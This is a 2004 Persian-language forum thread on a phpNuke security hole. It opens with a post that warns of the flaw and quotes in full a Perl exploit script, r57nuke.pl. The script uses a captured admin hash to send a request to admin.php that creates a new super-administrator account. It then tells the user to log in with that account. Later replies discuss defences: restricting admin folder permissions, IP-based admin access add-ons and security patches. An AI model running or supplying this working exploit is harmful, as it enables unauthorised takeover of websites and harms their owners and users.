آژانس هواپیمایی
pop up

سايت هاي نوك به اين روش هك ميشن مهم مهم مهم

شروع موضوع توسط ALICIVIL ‏16 فوریه 2004 در انجمن phpNuke - پی‌اچ‌پی نیوک

  1. ALICIVIL

    ALICIVIL کاربر تازه وارد

    تاریخ عضویت:
    ‏4 ژانویه 2004
    نوشته ها:
    43
    تشکر شده:
    0
    در سايت مجيد آنلاين هم اين مطلب رو نوشتم. لطفا حد اقل شما ها به فكر چاره باشيد .

    دوستان عزيز سلام
    همه سايتهاي نوشته شده با ن.ك به اين اكسپلويت جواب ميدن فكر كنم با اين حساب اين سيستم به درد خاله فرانسيسكو بارزي بخوره
    يك فايل پرل ميتونه پسورد ادمين رو بيرون بكشه ... خيلي راحت..........

    اين نوع هك با استفاده ار SQL Injection انجام ميشه
    اين هم فايل پرلش اگه ميتونيد روش كار كنيد اينم ضعف سيستم نوك

    #!/usr/bin/perl
    # * r57nuke.pl *
    # * php-nuke all versions and spaiz-nuke version < 1.2beta xploit *

    use IO::Socket;


    print "Enter host (e.g. www.phpnuke.com): \r\n";
    chomp($server=<STDIN>);
    # get new admin nick =)
    print "Enter u nick (e.g. hacker): \r\n";
    chomp($nick=<STDIN>);
    # get new admin pass =)
    print "Enter u pass (e.g. password): \r\n";
    chomp($pass=<STDIN>);
    # get admin hash =)
    print "Enter hash (e.g. YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6): \r\n";
    chomp($hash=<STDIN>);

    $port="80";

    $path="/admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid=$nick&[email protected]&add_pwd=$pass&admin=$hash";

    print "\r\nConnecting... ";

    $socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Photo => tcp)
    or die;

    print "OK \r\n";
    print "exploiting... ";

    # send string to server

    print $socket "POST $path HTTP/1.1\n";
    print $socket "Host: $server\n";
    print $socket "Accept: */*\n";
    print $socket "Referer: $server/admin.php\n";
    print $socket "User-Agent: r57spaiz\n";
    print $socket "Pragma: no-cache\n";
    print $socket "Cache-Control: no-cache\n";
    print $socket "Connection: close\n\n";

    print "OK \r\n";
    print "now u can go to $server/admin.php and just use login $nick and password $pass for access \r\n
     
  2. Acaro

    Acaro کاربر تازه وارد

    تاریخ عضویت:
    ‏14 نوامبر 2003
    نوشته ها:
    75
    تشکر شده:
    6
    سلام مجدد

    علي جان ... حالا نميدونم كه اين Exploit واقعا ميتونه اينكار رو انجام بده يا نه ... ولي خوب فرض رو بر اين ميذاريم كه ميتونه ... همونطوري هم كه تو مبحث " حفره نوك " گفتم ... به نظر من بهترين راهش اينه كه فايل و پوشه ادمين رو ما بعد از اينكه كار روزانه مون تموم شد سطح دسترسي به اون رو رو 700 ست كنيم ... حالا اگه پسورد رو هم در آوردن ... 1- نميتونن وارد منو مدير بشن و زماني كه به log فايل ها نگاه كني مي فهمي كه كي ميخواسته به سيستم مديريت وارد شه 2-اونقدر هم بيكار نيستن كه هر 5 دقيقه يكبار چك كنن ببينن ما كي سطح دسترسي اون رو تغيير ميديم تا بيان وارد سيستم بشن ... البته قبول دارم يكم سخته و تازه فقط براي سايت هايي است كه فقط 1 مدير دارند ...
    را دوم هم .. استفاده از Addon كه معرفي كردم است (System Protector ) اونطوري فقط سيستم اجازه ورود به منو مديريت را با IP يا IP هاي تعريف شده را ميده .. در ضمن هر كاربري كه مياد و زيادي فضولي تو سايت ميكنه ... منظورم اينه كه URL هاي نامتعارف وارد ميكنه رو شناسايي و Ban ميكنه ...

    من فكر كنم دومين راه حل معقول تره

    موفق باشي
     
  3. ALICIVIL

    ALICIVIL کاربر تازه وارد

    تاریخ عضویت:
    ‏4 ژانویه 2004
    نوشته ها:
    43
    تشکر شده:
    0
    سلام علي جان ...آقا با اي دي ياهو من در تماس باش... (OLD_ALICIVIL) البته اگه خوابم نبره سعي ميكنم زود زود به سايت سر بزنم... مكر ميكنم كه بتونيم يه را حل خوب پيدا بكنيم فقط بچه ها نظراتشون رو بنويسن.....اينطوري زود تر به نتيجه ميرسيم....اگه همه با هم همفكري بكنند زياد طول نميكشه ...
    :ph34r: اين هم خطاب به جناب هكر عزيز === زياد به خودتون نباليد شما حتي نمي تونيد 2 سطر از اين اسكريپتهايي كه باهاش كار ميكنيد رو بنويسيد بلكه دارين از تبحر و استعداد يه عده ديگه كه هدفشون نمايش ضعف هاي سيستم بوده سو’ استفاده ميكنيد. به اميد ديدار............
     
  4. ali

    ali کاربر تازه وارد

    تاریخ عضویت:
    ‏18 دسامبر 2002
    نوشته ها:
    1,101
    تشکر شده:
    11
    محل سکونت:
    tehran
    دقيقا حرف دلهع منو داري ميزني ! آخه اگه يه سايت ديگه كه سيستمش نوك نبود روهك كرده بودن دلم نمي سوخت مي گفتم يه چيزي بارشونه !
     
  5. knowhow

    knowhow مدیران قدیمی

    تاریخ عضویت:
    ‏25 دسامبر 2002
    نوشته ها:
    3,480
    تشکر شده:
    19
    خود سايت نوك در اين رابطه چيزي ننوشته !؟
    معمولا يك سري پچ مي ده كه مشكلات امنيتي رو حل مي كنه !!
     
  6. usgroup1

    usgroup1 کاربر تازه وارد

    تاریخ عضویت:
    ‏28 می 2003
    نوشته ها:
    137
    تشکر شده:
    0
    در مورد سيستم هاي opern source مثل phpnuke بايد حتما هميشه مثل خود هكر ها دنبال ضعف هاي امنيتي تازه كشف شده و پچ هاش باشي و هي سايتو update كني اين سايت رو ببينين هميشه سريع پچ هاي امنيتي رو ميزاره براي سوراخ هاي جديد : http://www.nukecops.com

    در ضمن همينجا بگم كه اونايي كه سايت nuke ورژن 6.5 داشتن و هك شده و نميتونن راحت اطلاعات رو به نسخه 7 update كنن من يه نسخه 6.5 امن دارم كه خودم فارسيش كردم با آخرين پچ هاي امنيتي (احتمالا :hmm: ) اگر مي خواين با من تماس بگيريد اينم يه دمو ازش http://www.persianboard.com
     
  7. boxilink